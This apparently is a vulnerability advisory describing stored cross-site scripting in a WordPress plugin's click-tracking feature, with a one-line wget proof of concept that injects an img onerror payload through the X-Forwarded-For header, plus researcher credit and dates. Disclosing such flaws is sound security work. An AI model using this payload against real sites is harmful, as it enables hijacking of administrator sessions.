The plugin does not validate, sanitise and escape the IP address of requests logged by the click tracking feature, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against admin viewing the tracked requests.
As unauthenticated: wget "https://example.com/?wpam_id=1" --header="X-Forwarded-For: <img src onerror=alert(/XSS/)>" -q -O- The XSS will be triggered when an admin access http://example.com/wp-admin/admin.php?page=wpam-clicktracking
Krzysztof Zając
Krzysztof Zając
Yes
2021-12-24 (about 1 years ago)
2021-12-24 (about 1 years ago)
2022-04-10 (about 9 months ago)